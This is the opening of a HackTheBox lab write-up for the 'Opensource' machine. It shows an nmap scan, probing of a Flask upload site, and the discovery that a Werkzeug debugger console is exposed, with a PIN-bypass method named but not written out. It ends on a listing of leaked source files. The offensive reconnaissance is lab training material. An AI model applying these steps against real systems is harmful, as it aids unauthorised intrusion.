Opensource is one of the machines currently available on the HackTheBox hacking platform, rated Easy.
In this case it is a machine based on the Linux operating system.
Port scanning
As usual, we add the IP of the Opensource machine, 10.10.11.164, to /etc/hosts as opensource.htb and start with the nmap port scan.
```
nmap -sV -sC -oA enumeration/nmap1 10.10.11.164
Nmap scan report for opensource.htb (10.10.11.164)
Host is up (0.34s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1e:59:05:7c:a9:58:c9:23:90:0f:75:23:82:3d:05:5f (RSA)
|   256 48:a8:53:e7:e0:08:aa:1d:96:86:52:bb:88:56:a0:b7 (ECDSA)
|_  256 02:1f:97:9e:3c:8e:7a:1c:7c:af:9d:5a:25:4b:b8:c8 (ED25519)
80/tcp   open     http    Werkzeug/2.1.2 Python/3.10.3
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.1.2 Python/3.10.3
|     Date: Sat, 23 Jul 2022 18:10:35 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 5316
|     Connection: close
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>upcloud - Upload files for Free!</title>
|     <script src="/static/vendor/jquery/jquery-3.4.1.min.js"></script>
|     <script src="/static/vendor/popper/popper.min.js"></script>
|     <script src="/static/vendor/bootstrap/js/bootstrap.min.js"></script>
|     <script src="/static/js/ie10-viewport-bug-workaround.js"></script>
|     <link rel="stylesheet" href="/static/vendor/bootstrap/css/bootstrap.css"/>
|     <link rel="stylesheet" href=" /static/vendor/bootstrap/css/bootstrap-grid.css"/>
|     <link rel="stylesheet" href=" /static/vendor/bootstrap/css/bootstrap-reboot.css"/>
|     <link rel=
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.1.2 Python/3.10.3
|     Date: Sat, 23 Jul 2022 18:10:36 GMT
|     Content-Type: text/html; charset=utf-8
|     Allow: HEAD, GET, OPTIONS
|     Content-Length: 0
|     Connection: close
|   RTSPRequest: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
|_http-title: upcloud - Upload files for Free!
|_http-server-header: Werkzeug/2.1.2 Python/3.10.3
3000/tcp filtered ppp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.92%I=7%D=7/23%Time=62DC399B%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,1573,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Werkzeug/2\.1\.2\x20P
SF:ython/3\.10\.3\r\nDate:\x20Sat,\x2023\x20Jul\x202022\x2018:10:35\x20GMT
SF:\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20
SF:5316\r\nConnection:\x20close\r\n\r\n<html\x20lang=\"en\">\n<head>\n\x20
SF:\x20\x20\x20<meta\x20charset=\"UTF-8\">\n\x20\x20\x20\x20<meta\x20name=
SF:\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1\.0\">\
SF:n\x20\x20\x20\x20<title>upcloud\x20-\x20Upload\x20files\x20for\x20Free!
SF:</title>\n\n\x20\x20\x20\x20<script\x20src=\"/static/vendor/jquery/jque
SF:ry-3\.4\.1\.min\.js\"></script>\n\x20\x20\x20\x20<script\x20src=\"/stat
SF:ic/vendor/popper/popper\.min\.js\"></script>\n\n\x20\x20\x20\x20<script
SF:\x20src=\"/static/vendor/bootstrap/js/bootstrap\.min\.js\"></script>\n\
SF:x20\x20\x20\x20<script\x20src=\"/static/js/ie10-viewport-bug-workaround
SF:\.js\"></script>\n\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href
SF:=\"/static/vendor/bootstrap/css/bootstrap\.css\"/>\n\x20\x20\x20\x20<li
SF:nk\x20rel=\"stylesheet\"\x20href=\"\x20/static/vendor/bootstrap/css/boo
SF:tstrap-grid\.css\"/>\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20hr
SF:ef=\"\x20/static/vendor/bootstrap/css/bootstrap-reboot\.css\"/>\n\n\x20
SF:\x20\x20\x20<link\x20rel=")%r(HTTPOptions,C7,"HTTP/1\.1\x20200\x20OK\r\
SF:nServer:\x20Werkzeug/2\.1\.2\x20Python/3\.10\.3\r\nDate:\x20Sat,\x2023\
SF:x20Jul\x202022\x2018:10:36\x20GMT\r\nContent-Type:\x20text/html;\x20cha
SF:rset=utf-8\r\nAllow:\x20HEAD,\x20GET,\x20OPTIONS\r\nContent-Length:\x20
SF:0\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,1F4,"<!DOCTYPE\x20HTM
SF:L\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x
SF:20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x
SF:20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equ
SF:iv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x
SF:20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x2
SF:0</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>E
SF:rror\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code
SF::\x20400</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Bad\x20req
SF:uest\x20version\x20\('RTSP/1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20<p>Error\x20code\x20explanation:\x20HTTPStatus\.BAD_REQUEST\x20-\x20
SF:Bad\x20request\x20syntax\x20or\x20unsupported\x20method\.</p>\n\x20\x20
SF:\x20\x20</body>\n</html>\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 23 18:12:44 2022 -- 1 IP address (1 host up) scanned in 250.52 seconds
```
We find three ports: 22, for which we have no credentials; 3000, which we cannot reach (filtered); and 80, where there is a web portal, which will be our next step.
Enumeration
We start by reviewing the web portal on port 80 and see the following page
We browse the site a bit and find two interesting things: a link to download a .zip file and a link to the /upcloud URL
There is not much else on this portal, so let's look at the upcloud portal, which looks like this
We try uploading different types of files, but get nothing interesting either, so we go to Burp to see what we can get.
We try to provoke errors in the application and get some interesting data by leaving the filename field empty
Looking at the error, we see that the portal uses the Werkzeug Debugger as the application's debugger, so we look up some information about it and browse to its console URL.
As expected, it was not going to be that easy: we need a PIN to reach the console and we don't have one, so we look for a vulnerability and find a script that lets us obtain that PIN, explained on the HackTricks website.
Reading that page, debug mode must be enabled for this to work, so let's look inside the zip file and see what we can find.
In it we find the following files:
```
$ unzip -v source.zip
Archive:  source.zip
 Length   Method    Size  Cmpr    Date    Time   CRC-32   Name
--------  ------  ------- ---- ---------- ----- --------  ----
       0  Stored        0   0% 04-28-2022 13:45 00000000  app/
       0  Stored        0   0% 04-28-2022 14:50 00000000  app/app/
     707  Defl:N      310  56% 04-28-2022 14:50 0b37879b  app/app/views.py
     262  Defl:N      160  39% 04-28-2022 13:34 3560fae7  app/app/__init__.py
       0  Stored        0   0% 04-28-2022 13:39 00000000  app/app/static/
       0  Stored        0   0% 04-28-2022 13:34 00000000  app/app/static/js/
    1920  Defl:N      691  64% 04-28-2022 13:34 975a2465  app/app/static/js/script.js
     668  Defl:N      404  40% 04-28-2022 13:34 3a81094a  app/app/static/js/ie10-viewport-bug-workaround.js
       0  Stored        0   0% 04-28-2022 13:34 00000000  app/app/static/vendor/
       0  Stored        0   0% 04-28-2022 13:34 00000000  app/app/static/vendor/bootstrap/
       0  Stored        0   0% 04-28-2022 13:34 00000000  app/app/static/vendor/bootstrap/js/
   80698  Defl:N    22723  72% 04-28-2022 13:34 b6b2ca06  app/app/static/vendor/bootstrap/js/bootstrap.bundle.min.js
  194435  Defl:N    47258  76% 04-28-2022 13:34 713a8cbd  app/app/static/vendor/bootstrap/js/bootstrap.min.js.map
  256099  Defl:N    59648  77% 04-28-2022 13:34 dec71e0e  app/app/static/vendor/bootstrap/js/bootstrap.js.map
  135079  Defl:N    25618  81% 04-28-2022 13:34 39ff8eef  app/app/static/vendor/bootstrap/js/bootstrap.js
  318045  Defl:N    83081  74% 04-28-2022 13:34 4e3f8238  app/app/static/vendor/bootstrap/js/bootstrap.bundle.min.js.map
  227980  Defl:N    48777  79% 04-28-2022 13:34 3913fd07  app/app/static/vendor/bootstrap/js/bootstrap.bundle.js
  410007  Defl:N    93545  77% 04-28-2022 13:34 482d446d  app/app/static/vendor/bootstrap/js/bootstrap.bundle.js.map
   60010  Defl:N    15847  74% 04-28-2022 13:34 bafa3e29  app/app/static/vendor/bootstrap/js/bootstrap.min.js
       0  Stored        0   0% 04-28-2022 13:34 00000000  app/app/static/vendor/bootstrap/css/
  504418  Defl:N   100444  80% 04-28-2022 13:34 e445c913  app/app/static/vendor/bootstrap/css/bootstrap.css.map
   32546  Defl:N     8156  75% 04-28-2022 13:34 390a02bf  app/app/static/vendor/bootstrap/css/bootstrap-reboot.min.css.map
   50935  Defl:N     6176  88% 04-28-2022 13:34 81a6cda5  app/app/static/vendor/bootstrap/css/bootstrap-grid.min.css
  115021  Defl:N    14490  87% 04-28-2022 13:34 ee59b49c  app/app/static/vendor/bootstrap/css/bootstrap-grid.min.css.map
   67871  Defl:N     7091  90% 04-28-2022 13:34 0a8bc033  app/app/static/vendor/bootstrap/css/bootstrap-grid.css
  157964  Defl:N    27749  82% 04-28-2022 13:34 daf22781  app/app/static/vendor/bootstrap/css/bootstrap-grid.css.map
  197170  Defl:N    25914  87% 04-28-2022 13:34 47747fd4  app/app/static/vendor/bootstrap/css/bootstrap.css
    4793  Defl:N     1691  65% 04-28-2022 13:34 47bb1bec  app/app/static/vendor/bootstrap/css/bootstrap-reboot.css
  641867  Defl:N   103885  84% 04-28-2022 13:34 ce0118b7  app/app/static/vendor/bootstrap/css/bootstrap.min.css.map
   77346  Defl:N    17275  78% 04-28-2022 13:34 1c6139ea  app/app/static/vendor/bootstrap/css/bootstrap-reboot.css.map
    3927  Defl:N     1584  60% 04-28-2022 13:34 0c8576f0  app/app/static/vendor/bootstrap/css/bootstrap-reboot.min.css
  159515  Defl:N    23592  85% 04-28-2022 13:34 4e48b380  app/app/static/vendor/bootstrap/css/bootstrap.min.css
       0  Stored        0   0% 04-28-2022 13:34 00000000  app/app/static/vendor/font-awesome/
   59344  Defl:N    12814  78% 04-28-2022 13:34 8cac5ff5  app/app/static/vendor/font-awesome/all.min.css
       0  Stored        0   0% 04-28-2022 13:34 00000000  app/app/static/vendor/popper/
   36692  Defl:N     9687  74% 04-28-2022 13:34 d029fa28  app/app/static/vendor/popper/popper-utils.js
   53858  Defl:N    15453  71% 04-28-2022 13:34 5998df74  app/app/static/vendor/popper/popper-utils.min.js.map
    3114  Defl:N      994  68% 04-28-2022 13:34 a45f3f4d  app/app/static/vendor/popper/popper.js.flow
  140875  Defl:N    40202  72% 04-28-2022 13:34 1bcf6894  app/app/static/vendor/popper/popper.js.map
   61884  Defl:N    17780  71% 04-28-2022 13:34 81ab804e  app/app/static/vendor/popper/popper-utils.js.map
  123890  Defl:N    35381  71% 04-28-2022 13:34 b2abe30b  app/app/static/vendor/popper/popper.min.js.map
   10831  Defl:N     4166  62% 04-28-2022 13:34 9554d60f  app/app/static/vendor/popper/popper-utils.min.js
   21257  Defl:N     7508  65% 04-28-2022 13:34 e3404892  app/app/static/vendor/popper/popper.min.js
   88768  Defl:N    22589  75% 04-28-2022 13:34 7dee74b1  app/app/static/vendor/popper/popper.js
       0  Stored        0   0% 04-28-2022 13:34 00000000  app/app/static/vendor/jquery/
   88145  Defl:N    30572  65% 04-28-2022 13:34 5be48651  app/app/static/vendor/jquery/jquery-3.4.1.min.js
  280364  Defl:N    83136  70% 04-28-2022 13:34 17190ba3  app/app/static/vendor/jquery/jquery-3.4.1.js
  136409  Defl:N    54634  60% 04-28-2022 13:34 89d9dfae  app/app/static/vendor/jquery/jquery-3.4.1.min.map
       0  Stored        0   0% 04-28-2022 13:34 00000000  app/app/static/css/
    1162  Defl:N      462  60% 04-28-2022 13:34 e17dfa2f  app/app/static/css/style.css
       0  Stored        0   0% 04-28-2022 13:34 00000000  app/app/templates/
    1666  Defl:N      573  66% 04-28-2022 13:34 94872c59  app/app/templates/success.html
    1631  Defl:N      560  66% 04-28-2022 13:34 88f8c2fb  app/app/templates/upload.html
    5533  Defl:N     1799  68% 04-28-2022 13:34 cb749443  app/app/templates/index.html
     816  Defl:N      340  58% 04-28-2022 13:34 350e39b7  app/app/utils.py
     332  Defl:N      180  46% 04-28-2022 13:34 c9fba34e  app/app/configuration.py
     141  Defl:N      114  19% 04-28-2022 13:34 b103be2f  app/run.py
       0  Stored        0   0% 04-28-2022 13:34 00000000  app/public/
       0  Stored        0   0% 04-28-2022 13:34 00000000  app/public/uploads/
       0  Stored        0   0% 04-28-2022 13:46 00000000  app/.vscode/
       0  Stored        0   0% 04-28-2022 13:34 00000000  app/INSTALL.md
     110  Defl:N       78  29% 04-28-2022 13:40 11993293  build-docker.sh
       0  Stored        0   0% 04-28-2022 13:34 00000000  config/
     253  Defl:N      137  46% 04-28-2022 13:34 d1b7915b  config/supervisord.conf
     574  Defl:N      338  41% 04-28-2022 14:50 8c686a2d  Dockerfile
       0  Stored        0   0% 04-28-2022 14:50 00000000  .git/
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/branches/
      73  Defl:N       63  14% 04-28-2022 13:45 1f078b37  .git/description
      92  Defl:N       79  14% 04-28-2022 13:45 c1003537  .git/config
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/info/
     240  Defl:N      173  28% 04-28-2022 13:45 21cd3d77  .git/info/exclude
       0  Stored        0   0% 04-28-2022 13:55 00000000  .git/objects/
       0  Stored        0   0% 04-28-2022 13:55 00000000  .git/objects/01/
     156  Stored      156   0% 04-28-2022 13:55 6f1f5573  .git/objects/01/c76bb30cbd05b810719576d79b5535a56475f1
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/11/
      54  Stored       54   0% 04-28-2022 13:45 6a443d97  .git/objects/11/3af9958c392c6d0212475bf4c7581aff34e857
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/85/
     353  Stored      353   0% 04-28-2022 13:45 2b24c34a  .git/objects/85/643d0e06aa610d2d6ed0c45ebf6dd82c458570
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/1b/
      92  Stored       92   0% 04-28-2022 13:45 c66ab382  .git/objects/1b/762678bd7ccbfd0fed00090ace78df893583d1
   19875  Defl:N    18772   6% 04-28-2022 13:45 e05a0cff  .git/objects/1b/393db3e482ab736dd3873389c279195992e32d
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/53/
    1698  Stored     1698   0% 04-28-2022 13:45 e341e81f  .git/objects/53/08df61af3cc99e54552086213bdf1b8af4af31
   62834  Defl:N    62844   0% 04-28-2022 13:45 3eb7232e  .git/objects/53/4452210e7129a8a33f14a29996c060ab69fad1
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/82/
     101  Stored      101   0% 04-28-2022 13:45 0d3fccff  .git/objects/82/8b110e78e2662f04a6b450794ea6a143b856d0
       0  Stored        0   0% 04-28-2022 13:46 00000000  .git/objects/ec/
     147  Stored      147   0% 04-28-2022 13:46 6f985de7  .git/objects/ec/dcff58f44abdd59b1604d9defad47ae9ac014a
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/b9/
  138152  Defl:N   136674   1% 04-28-2022 13:45 5f761b26  .git/objects/b9/39eb6f394c22a5df6277b881e7d86fc6975797
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/b8/
    9610  Stored     9610   0% 04-28-2022 13:45 7f18fd42  .git/objects/b8/551f7c0f0060c97ad5e0a348fec522d7e26247
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/b3/
     420  Stored      420   0% 04-28-2022 13:45 512bb529  .git/objects/b3/35ef943e6e59799cded40fe3581dbeb3a0e304
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/37/
     155  Stored      155   0% 04-28-2022 13:45 6bbceb5f  .git/objects/37/e4fddd6afde7f29122ea9854f6f00708eef9cc
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/86/
   35150  Defl:N    33618   4% 04-28-2022 13:45 cca37432  .git/objects/86/61e3e354d62d2443029226e2ff98681ac8d19d
   31622  Defl:N    31111   2% 04-28-2022 13:45 3c98280b  .git/objects/86/b6845bc342029a92ad908781435f95f000fabb
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/50/
   21452  Stored    21452   0% 04-28-2022 13:45 e092862b  .git/objects/50/e078af7758688b22e38524442f84b2916c195d
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/29/
    1973  Stored     1973   0% 04-28-2022 13:45 2b63fa98  .git/objects/29/218c7abb8d1eef5ae1a565f4215859a5e04e2c
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/93/
  121134  Defl:N   121154   0% 04-28-2022 13:45 f257b95f  .git/objects/93/cf73e9c5dc8bf95c8f530db5b8ba841d3d1a4d
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/87/
     195  Stored      195   0% 04-28-2022 13:45 bb362729  .git/objects/87/7f2911abd7c04bcce9d42049d86c73c671e8bc
       0  Stored        0   0% 04-28-2022 13:46 00000000  .git/objects/aa/
     219  Stored      219   0% 04-28-2022 13:46 659af154  .git/objects/aa/9fb67aa733586ee65dc406d6806b21015640e5
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/91/
    1864  Stored     1864   0% 04-28-2022 13:45 10524775  .git/objects/91/b0fc4c816cd0acedb996444c4d3ec6703e3805
     501  Stored      501   0% 04-28-2022 13:45 122a1e47  .git/objects/91/e52aff2d47925152a36ce0dd5b699eba389e99
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/25/
   10357  Defl:N     9762   6% 04-28-2022 13:45 9b19b069  .git/objects/25/9a9e2c65738b9d749872c944e423531fd92159
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/info/
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/76/
     368  Stored      368   0% 04-28-2022 13:45 58acafba  .git/objects/76/c7768054872091618fa842fac99591c5025edf
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/8a/
    8378  Stored     8378   0% 04-28-2022 13:45 f9009d2e  .git/objects/8a/17212f7dba4ce8b961eff7efe8ef5ba8c60844
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/ee/
     374  Stored      374   0% 04-28-2022 13:45 bfbf4e8b  .git/objects/ee/bf49dda43477217cd8fad2458f1057a81bd1f5
     117  Stored      117   0% 04-28-2022 13:45 f1b5f182  .git/objects/ee/9d9f1ef9156c787d53074493e39ae364cd1e05
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/pack/
       0  Stored        0   0% 04-28-2022 13:46 00000000  .git/objects/e5/
   77504  Defl:N    77519   0% 04-28-2022 13:45 870f49d2  .git/objects/e5/f6ce91b3818406be808fdd80b86fc7db5c588b
     163  Stored      163   0% 04-28-2022 13:46 6eb2d17f  .git/objects/e5/0a290eba9e29c5dea26df2a512361d400e93eb
   19595  Stored    19595   0% 04-28-2022 13:45 9ec36f0c  .git/objects/e5/a242994035de13059fe6f1fe974bf35a2291e1
     156  Stored      156   0% 04-28-2022 13:46 6fbefb26  .git/objects/e5/7842ccd63e316712011d87445a9022e83576e9
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/a3/
     107  Stored      107   0% 04-28-2022 13:45 ae800fc7  .git/objects/a3/d005ade1721d0c87ec4287ed0e60b53f63d569
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/5c/
     176  Stored      176   0% 04-28-2022 13:45 9f147e05  .git/objects/5c/2ecc06a02ed69a5253b7154485b0e2c606aa36
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/70/
   21269  Stored    21269   0% 04-28-2022 13:45 60af90c2  .git/objects/70/1f6715c2c754ca5f03d1009a949400354160b2
       0  Stored        0   0% 04-28-2022 13:47 00000000  .git/objects/08/
     367  Stored      367   0% 04-28-2022 13:47 104a3988  .git/objects/08/75edac6822cf53d0045bc4476e0bd522d29d9d
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/77/
  101394  Defl:N   101414   0% 04-28-2022 13:45 f45e195f  .git/objects/77/3ad95c56f8321eb4901736930024ec517a948a
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/7f/
   18417  Stored    18417   0% 04-28-2022 13:45 6bb5d62e  .git/objects/7f/da3a91d07531f3ba02c93248631bccc4ddda8a
   28052  Stored    28052   0% 04-28-2022 13:45 17ddf6e3  .git/objects/7f/a913deacc3b7847486fae18020a4831f2b51b6
       0  Stored        0   0% 04-28-2022 13:55 00000000  .git/objects/5b/
     355  Stored      355   0% 04-28-2022 13:55 a976cffb  .git/objects/5b/0553c0d960b11bb7fd04da3fa5e37020f35db2
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/e1/
   14767  Stored    14767   0% 04-28-2022 13:45 1f837502  .git/objects/e1/e271c00e31d309e9bab411caeef86d6d6d0d57
   63344  Defl:N    63354   0% 04-28-2022 13:45 1d75747f  .git/objects/e1/5edef2c718c3e0f6050a1d4e6d749386296e0d
       0  Stored        0   0% 04-28-2022 13:47 00000000  .git/objects/8f/
     190  Stored      190   0% 04-28-2022 13:47 6ae2f179  .git/objects/8f/f2027d53c22e75460200977dd966773933c30c
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/31/
     626  Stored      626   0% 04-28-2022 13:45 c5b9eda0  .git/objects/31/6cd1d162be732601b26c1b9f46546d8b1209c5
       0  Stored        0   0% 04-28-2022 13:46 00000000  .git/objects/a7/
     145  Stored      145   0% 04-28-2022 13:46 583aa541  .git/objects/a7/6f8f75f7a4a12b706b0cf9c983796fa1985820
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/fd/
     610  Stored      610   0% 04-28-2022 13:45 5931a5b6  .git/objects/fd/19858d0b3269448cf5f2cd3a988727a27415a4
       0  Stored        0   0% 04-28-2022 13:46 00000000  .git/objects/0f/
     393  Stored      393   0% 04-28-2022 13:46 e11bba41  .git/objects/0f/3cc379de048a55642009ee899132cb04f84c6e
       0  Stored        0   0% 04-28-2022 13:46 00000000  .git/objects/9d/
     219  Stored      219   0% 04-28-2022 13:55 40310155  .git/objects/9d/a413163072158640354b63db1d82cae4367bee
      58  Stored       58   0% 04-28-2022 13:46 a47edea9  .git/objects/9d/e5383aec4b81e320b29a4ff0f16a3a33f60da9
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/a1/
   35754  Defl:N    35764   0% 04-28-2022 13:45 4b4b5dd9  .git/objects/a1/c07fd803b5fc9c54f44e31123ae4fa11e134b0
     155  Stored      155   0% 04-28-2022 13:45 57836722  .git/objects/a1/4dd360b1fdf481873dcbd288c9037b934970bc
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/b6/
     129  Stored      129   0% 04-28-2022 13:45 c62ae3d2  .git/objects/b6/4e36b749bcca1e16eabde17ccc77e218d78f6a
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/5a/
      71  Stored       71   0% 04-28-2022 13:45 f518c569  .git/objects/5a/3c83058128500ebcf9b32c1937d18375c1a3e4
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/a8/
   11702  Stored    11702   0% 04-28-2022 13:45 7d73ed00  .git/objects/a8/8adb24679db295091b507cf9aec34286cb4b26
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/5f/
      61  Stored       61   0% 04-28-2022 13:45 0be853e5  .git/objects/5f/189204957c5ca59d8c196700f981a0bc1f3382
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/4f/
     116  Stored      116   0% 04-28-2022 13:45 c3d17523  .git/objects/4f/bc8b1fefcef63e9ad49a0e222ff995562d9d58
       0  Stored        0   0% 04-28-2022 13:46 00000000  .git/objects/f6/
     190  Stored      190   0% 04-28-2022 13:46 463a9102  .git/objects/f6/09a935fc30dfb68dd7ac49ae040d08e81f507d
    4542  Stored     4542   0% 04-28-2022 13:45 2fec4543  .git/objects/f6/560a15ede1d0bb198ab25f91368fd503356de3
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/54/
  103757  Defl:N   103777   0% 04-28-2022 13:45 cd84d1d4  .git/objects/54/d2495018b0d93630a2ce0811fd246fafbcd569
       0  Stored        0   0% 04-28-2022 13:46 00000000  .git/objects/59/
     163  Stored      163   0% 04-28-2022 13:46 39fbe149  .git/objects/59/75e3fdba44cebb64414efbfb80ac26553718a4
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/f1/
   34043  Defl:N    34053   0% 04-28-2022 13:45 4777c2fe  .git/objects/f1/e68d3190fb90ef5ae4ba6672efc19186771aca
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/8e/
   35560  Defl:N    35204   1% 04-28-2022 13:45 a8b6fe69  .git/objects/8e/ac957a5120eb7e5a6b1f838cfcac1fbd5653c9
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/75/
   59835  Defl:N    59845   0% 04-28-2022 13:45 f78b37b3  .git/objects/75/7dbf30c59149020cdf78577e8a5c08e3c9209d
       0  Stored        0   0% 04-28-2022 13:55 00000000  .git/objects/2c/
     167  Stored      167   0% 04-28-2022 13:55 739849e5  .git/objects/2c/67a52253c6fe1f206ad82ba747e43208e8cfd9
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/78/
   27727  Stored    27727   0% 04-28-2022 13:45 7ca805ac  .git/objects/78/c533b4e7ecb48d0da3017e1361c05765ff43c9
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/40/
     744  Stored      744   0% 04-28-2022 13:45 2b135d45  .git/objects/40/1c74464f72ee6ed272d285e6fafc62448b0a33
     118  Stored      118   0% 04-28-2022 13:45 55775271  .git/objects/40/9ca91f74588be526c7ab87e5c2154f7034310e
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/d5/
    1100  Stored     1100   0% 04-28-2022 13:45 686927ed  .git/objects/d5/6fdda243544fedc531908ad92a82d892e7f308
       0  Stored        0   0% 04-28-2022 13:47 00000000  .git/objects/c4/
     151  Stored      151   0% 04-28-2022 13:47 e71739af  .git/objects/c4/1fedef2ec6df98735c11b2faf1e79ef492a0f3
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/7a/
     250  Stored      250   0% 04-28-2022 13:45 8fa60389  .git/objects/7a/92370b5b844a1008400ba6b7069bcf030ffcfb
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/65/
    8803  Defl:N     8320   6% 04-28-2022 13:45 e300fffb  .git/objects/65/33f319a8a39c9164dbcec7fce73b0ac9dc087b
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/0d/
      56  Stored       56   0% 04-28-2022 13:45 f53b3d7f  .git/objects/0d/cad638424fdd8add9a50ab779616d425199245
       0  Stored        0   0% 04-28-2022 13:46 00000000  .git/objects/be/
     150  Stored      150   0% 04-28-2022 13:46 54358b8f  .git/objects/be/4da71987bbbc8fae7c961fb2de01ebd0be1997
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/71/
   42131  Defl:N    42141   0% 04-28-2022 13:45 fc24b74c  .git/objects/71/07f613cf77c4450a1380ce3ef092f640c346a1
     116  Stored      116   0% 04-28-2022 13:55 25602cf1  .git/objects/71/9e506f4dfc00174a943d4470b1f4b763aa2bfa
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/52/
  127332  Defl:N   125725   1% 04-28-2022 13:45 1b23bbb8  .git/objects/52/1afc5be7274b71582d5518445cac3b56704391
       0  Stored        0   0% 04-28-2022 13:46 00000000  .git/objects/c8/
     116  Stored      116   0% 04-28-2022 13:46 24c7f29c  .git/objects/c8/6e16606492ba5ffe5386e2079e48d964d6e6e9
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/1a/
     274  Stored      274   0% 04-28-2022 13:45 b1a88a1d  .git/objects/1a/a4e26b684800bd784b2ca8f3c062f1036dd015
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/96/
   48598  Defl:N    48608   0% 04-28-2022 13:45 c3a5094d  .git/objects/96/333634a746368a1df7b655a3359ae16a41cd99
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/f2/
     341  Stored      341   0% 04-28-2022 13:55 4928a02f  .git/objects/f2/744c6346a6a482f2a5b9926296f32f2e215e0a
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/3a/
     148  Stored      148   0% 04-28-2022 13:45 2bdc24c6  .git/objects/3a/c0f1cba62483bc4af5d2804a708d6ed02dba0a
